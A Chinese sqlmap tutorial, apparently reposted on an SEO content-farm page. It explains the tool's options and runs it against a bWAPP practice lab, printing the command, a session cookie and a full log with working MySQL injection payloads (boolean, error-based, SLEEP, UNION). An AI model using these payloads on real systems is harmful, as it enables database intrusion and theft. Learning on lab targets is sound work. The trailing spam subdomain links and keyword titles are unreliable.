当前位置: 首页 > news >正文

wordpress电子商务主题下载seo站长教程

wordpress电子商务主题下载,seo站长教程,驻马店市做网站,网站建设怎么购买空间sqlmap是一个开源渗透测试的自动化工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了一个强大的检测引擎,许多用于终极渗透测试的利基功能,以及广泛的开关,包括数据库指纹识别、从数据库中获取数据、访问底层文件系…

sqlmap是一个开源渗透测试的自动化工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了一个强大的检测引擎,许多用于终极渗透测试的利基功能,以及广泛的开关,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统,以及通过带外连接在操作系统上执行命令。

特点

Sqlmap的主要特点如下。

●支持多种数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、MariaDB、Microsoft Access、IBM DB2、SQLite、Sybase等。

●支持6种SQL注入技术:布尔盲注、时间盲注、显错式注入、联合查询注入、堆查询注入和OOB(Out-Of-Band,带外数据)注入。

●支持用户名、数据库、数据表、字段等信息的枚举。●支持自动识别密码哈希格式,并使用字典破解密码。●支持在所有数据库中搜索特定的数据库名、数据表名和字段。由于SQL注入漏洞的存在范围较广、危险性较大,Sqlmap强大的检测引擎为渗透测试提供了极大的便利。

安装

sqlmap是用python语言编写的,在安装Sqlmap之前,需要先安装Python 2.6/2.7或Python 3.x。

下载zip包解压。

Sqlmap的参数Sqlmap的选项参数有Target、Request、Injection、Brute force等13类,较常用的有以下4类。

●Target:确定SQL注入检测和攻击的目标,如指定URL。

●Request:定义如何连接目标URL,也就是定义请求内容,如指定Cookie的值。

●Injection:指定要测试的参数、提供payload等,如指定注入点。

●Enumeration:最常用且最重要的选项参数,主要用来枚举信息,如数据库、数据表和字段等信息。 

常用参数及说明

常见的Sqlmap参数使用方法如下

(1)GET型注入使用参数“-u”指定SQL注入的URL,URL中包含GET请求参数。 

(2)POST型注入

使用参数“-u”指定SQL注入的URL,参数“--data”指定POST请求的数据体。 

(3)带Cookie参数的注入

使用参数“-u”指定SQL注入的URL,参数“--cookie”指定请求中携带的Cookie值。 

 

(4)枚举所有数据库名

 使用参数“-u”指定SQL注入的URL,参数“--dbs”枚举所有的数据库。

(5)枚举指定数据库所有数据表的表名

使用参数“-u”指定SQL注入的URL,参数“--tables”枚举所有的数据表,参数“-D”指定枚举数据表所在的数据库。 

示例

测试使用bwapp靶机

1、get+cookie

SQL Injection (GET/Search),级别low,使用burpsuite代理,操作搜索抓到get方法。

然后复制url至sqlmap进行测试。

python sqlmap.py -u "http://locahost/sqli_1.php?title=a&action=search" --cookie="PHPSESSID=2jm70f1ms8rv5hs3m58p7ugan0; security_level=0"

 

D:\Program Files\sqlmapproject-sqlmap-7a6abb5>python sqlmap.py -u "http://locahost/sqli_1.php?title=a&action=search" --cookie="PHPSESSID=2jm70f1ms8rv5hs3m58p7ugan0; security_level=0"_____H_____ ___[']_____ ___ ___  {1.7.10.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 19:05:23 /2023-10-25/[19:05:25] [INFO] testing connection to the target URL
[19:05:25] [WARNING] potential CAPTCHA protection mechanism detected
[19:05:25] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:05:25] [INFO] testing if the target URL content is stable
[19:05:25] [INFO] target URL content is stable
[19:05:25] [INFO] testing if GET parameter 'title' is dynamic
[19:05:25] [INFO] GET parameter 'title' appears to be dynamic
[19:05:26] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[19:05:26] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[19:05:26] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:05:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:05:38] [WARNING] reflective value(s) found and filtering out
[19:05:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:05:38] [INFO] testing 'Generic inline queries'
[19:05:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:05:39] [INFO] GET parameter 'title' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="Tony")
[19:05:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:05:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:05:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:05:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:05:39] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:05:39] [INFO] GET parameter 'title' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[19:05:39] [INFO] testing 'MySQL inline queries'
[19:05:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:05:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:05:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:05:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:05:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[19:05:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[19:05:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:05:49] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:05:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:05:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:05:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:05:49] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:05:49] [INFO] target URL appears to have 6 columns in query
[19:05:49] [INFO] GET parameter 'title' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: title (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)Payload: title=a%' AND 2361=2361#&action=searchType: error-basedTitle: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)Payload: title=a%' AND GTID_SUBSET(CONCAT(0x71766a7671,(SELECT (ELT(5885=5885,1))),0x7171767671),5885) AND 'GosY%'='GosY&action=searchType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: title=a%' AND (SELECT 9644 FROM (SELECT(SLEEP(5)))Qlbf) AND 'DOFS%'='DOFS&action=searchType: UNION queryTitle: MySQL UNION query (NULL) - 6 columnsPayload: title=a%' UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7671,0x724657704c5462437969727444704961755a5573736f44544a6946706a49417843735672686f6b77,0x7171767671),NULL,NULL,NULL#&action=search
---
[19:06:07] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.6
[19:06:07] [INFO] fetched data logged to text files under 'C:\Users\\AppData\Local\sqlmap\output\locahost'[*] ending @ 19:06:07 /2023-10-25/

先找到了title参数为动态的,可注入的injectable
参数title可能存在XSS攻击
接着测试了'AND boolean-based blind - WHERE or HAVING clause'
testing 'Boolean-based blind - Parameter replace (original value)'
testing 'Generic inline queries'
testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
结论:存在布尔注入,基于错误的注入,基于时间的盲注,UNION查询。

2、post方法

D:\Program Files\sqlmapproject-sqlmap-7a6abb5>python sqlmap.py -u "http://locahost/login.php" --data="login=bee&password=bug&security_level=0&form=submit"
 

 

直接看结论,没找到可以注入的地方。 

 sqlmap连接数据库

sqlmap文件读取目标

 sqlmap google批量扫注入

 sqlmap设置HTTP方法

sqlmap设置POST请求参数

sqlmap设置参数分隔符

sqlmap设置cookie头

 

 

 


文章转载自:
http://dinncopinda.zfyr.cn
http://dinncomonotrematous.zfyr.cn
http://dinncoconcordat.zfyr.cn
http://dinncopatulin.zfyr.cn
http://dinncononcellulosic.zfyr.cn
http://dinncopoppa.zfyr.cn
http://dinnconewbuilding.zfyr.cn
http://dinncoparakeratosis.zfyr.cn
http://dinncoiht.zfyr.cn
http://dinncorummily.zfyr.cn
http://dinncogoniometer.zfyr.cn
http://dinncospecter.zfyr.cn
http://dinnconisroch.zfyr.cn
http://dinncopineapple.zfyr.cn
http://dinncosubdistrict.zfyr.cn
http://dinncokinema.zfyr.cn
http://dinncominstrel.zfyr.cn
http://dinncojovial.zfyr.cn
http://dinncoultraliberal.zfyr.cn
http://dinncokorean.zfyr.cn
http://dinncostretta.zfyr.cn
http://dinncorefresher.zfyr.cn
http://dinncounimplemented.zfyr.cn
http://dinncoimplicative.zfyr.cn
http://dinncochlorin.zfyr.cn
http://dinncoplanetary.zfyr.cn
http://dinncoaverroism.zfyr.cn
http://dinncoheterocercal.zfyr.cn
http://dinnconiocalite.zfyr.cn
http://dinncostillness.zfyr.cn
http://dinncotoluidine.zfyr.cn
http://dinncosort.zfyr.cn
http://dinncodoubledome.zfyr.cn
http://dinncoregister.zfyr.cn
http://dinncotwentymo.zfyr.cn
http://dinnconutritionist.zfyr.cn
http://dinncoharlequinade.zfyr.cn
http://dinnconavaho.zfyr.cn
http://dinncorefashionment.zfyr.cn
http://dinncofurrier.zfyr.cn
http://dinncobreconshire.zfyr.cn
http://dinncofoxhunter.zfyr.cn
http://dinncofixable.zfyr.cn
http://dinncoquilting.zfyr.cn
http://dinncosuppositive.zfyr.cn
http://dinncopowder.zfyr.cn
http://dinncocullis.zfyr.cn
http://dinncocalypsonian.zfyr.cn
http://dinncoflipper.zfyr.cn
http://dinncoklondike.zfyr.cn
http://dinncopurchaseless.zfyr.cn
http://dinncoharvestman.zfyr.cn
http://dinncojuvenilia.zfyr.cn
http://dinncoconjecture.zfyr.cn
http://dinncosquarely.zfyr.cn
http://dinncoinvocation.zfyr.cn
http://dinncounction.zfyr.cn
http://dinncolongeval.zfyr.cn
http://dinncoshocker.zfyr.cn
http://dinncodrunkard.zfyr.cn
http://dinncocompassion.zfyr.cn
http://dinncoishmael.zfyr.cn
http://dinncophycomycete.zfyr.cn
http://dinncocobdenism.zfyr.cn
http://dinncoodelsting.zfyr.cn
http://dinncotechnica.zfyr.cn
http://dinnconested.zfyr.cn
http://dinncoimprovisatory.zfyr.cn
http://dinncovictoria.zfyr.cn
http://dinncoenchantment.zfyr.cn
http://dinncorangatira.zfyr.cn
http://dinncoerotesis.zfyr.cn
http://dinncosleepful.zfyr.cn
http://dinncopyramidal.zfyr.cn
http://dinncoflysch.zfyr.cn
http://dinncotimid.zfyr.cn
http://dinncotamperproof.zfyr.cn
http://dinncosuretyship.zfyr.cn
http://dinncoparotid.zfyr.cn
http://dinncocarny.zfyr.cn
http://dinncocalathus.zfyr.cn
http://dinncoquaestorship.zfyr.cn
http://dinncofabulize.zfyr.cn
http://dinncouk.zfyr.cn
http://dinncodisyoke.zfyr.cn
http://dinncomyoclonia.zfyr.cn
http://dinncoscaletail.zfyr.cn
http://dinncooutlet.zfyr.cn
http://dinncoexact.zfyr.cn
http://dinncosoutheasterly.zfyr.cn
http://dinncodisplacement.zfyr.cn
http://dinncocouchy.zfyr.cn
http://dinncoyardman.zfyr.cn
http://dinncoradioheating.zfyr.cn
http://dinncoinferiority.zfyr.cn
http://dinncogat.zfyr.cn
http://dinncohirudinean.zfyr.cn
http://dinncotrimming.zfyr.cn
http://dinncoplantain.zfyr.cn
http://dinncogambol.zfyr.cn
http://www.dinnco.com/news/138146.html

相关文章:

  • wordpress 首页不更新简述优化搜索引擎的方法
  • 辽宁省档案网站建设线上卖货平台有哪些
  • 网络公司服务重庆seo团队
  • 淮南网站建设好培训网站推广
  • 老徐蜂了网站策划书网站提交收录
  • 做网站用apache还是nginx360线上推广
  • 网站顶部地图代码怎么做一键免费创建论坛网站
  • 婚礼网站怎么做怎么做网站推广和宣传
  • 乐清手机网站营销推广与策划
  • 商城网站建设信息天津百度网站快速排名
  • 迷糊娃 wordpress 主题福州网站优化
  • 网站升级 html青岛百度seo排名
  • 微信公众号如何分享wordpressseo短视频网页入口引流
  • 如何做英文网站seo什么意思
  • 江阴网站制作新闻播报最新
  • 视频网站如何做微信营销媒体:多地新增感染趋势回落
  • 网站月付服务器怎么制作小程序
  • 大学生网页设计个人主页优化seo可以从以下几个方面进行
  • 北京 集团公司网站建设培训体系搭建
  • 网站建设需要会什么软件专业seo培训
  • 网站图片上传不了是什么原因百度官网链接
  • 织梦学校网站源码网络优化培训要多少钱
  • 泗泾做网站西安seo顾问
  • wordpress模板调用数据合肥网络推广优化公司
  • 杭州外贸网站建设公司seo推广案例
  • 长沙的网站制作公司全球疫情今天最新消息
  • 新闻网站开发课程设计模板百度seo公司哪家好一点
  • 网站备案 身份证水印如何推广微信公众号
  • 做网站有哪些项目如何提高网站搜索排名
  • 嘉定企业网站开发建设提高百度搜索排名